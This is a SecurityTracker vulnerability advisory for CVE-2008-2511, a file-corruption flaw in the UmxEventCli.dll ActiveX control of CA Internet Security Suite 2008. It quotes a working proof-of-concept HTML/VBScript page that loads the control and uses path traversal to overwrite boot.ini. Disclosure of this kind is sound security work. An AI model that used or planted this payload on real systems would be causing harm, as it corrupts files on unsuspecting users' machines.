CA Internet Security 'UmxEventCliLib' ActiveX Control Lets Remote Users Corrupt Files
|
|
SecurityTracker Alert ID: 1020129 |
|
SecurityTracker URL: http://securitytracker.com/id/1020129
|
|
CVE Reference:
CVE-2008-2511
(Links to External Site)
|
Updated: Jun 3 2008
|
Original Entry Date: May 28 2008
|
Impact:
Denial of service via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2008
|
Description:
A vulnerability was reported in CA Internet Security. A remote user can cause denial of service conditions.
A remote user can create specially crafted HTML that, when loaded by the target user, will invoke the 'UmxEventCli.dll' ActiveX control and corrupt files on the target user's system.
The CLSID of the vulnerable control is: F13D3742-6C4F-4915-BF91-784BA02DD0BE
A demonstration exploit is available at:
http://retrogod.altervista.org/9sg_CA_poc.html
surfista of Nine:Situations:Group reported this vulnerability.
|
Impact:
A remote user can create HTML that, when loaded by the target user, will corrupt files on the target user's system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.ca.com/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 28 May 2008 07:23:47 -0000
Subject: [NSG_28-5-08] CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
|
<!--
CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
remote file corruption poc
by Nine:Situations:Group::surfista
this control is safe for scripting
and safe for initialize
original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>
|
|
